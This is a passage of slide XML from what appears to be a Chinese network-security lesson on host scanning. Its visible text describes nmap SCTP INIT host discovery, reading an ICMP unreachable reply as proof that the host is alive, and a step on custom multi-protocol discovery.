                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="文本框 130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377180" y="1309688"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.使用nmap工具发送一个SCTP协议的INIT包到目标主机，如图2-2-27所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377180" y="1954848"/>
            <a:ext cx="5267325" cy="3571875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="文本框 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5377180" y="5526723"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-27 发送INIT包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行SCTP协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤六</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="文本框 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5657215" y="1084898"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.目标主机返回了一个目标不可达的ICMP包，说明目标主机是存活的，如图2-2-28所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5657215" y="1730058"/>
            <a:ext cx="5267325" cy="3590925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="文本框 132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5657215" y="5320983"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-28 目标主机响应ICMP包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行自定义多协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
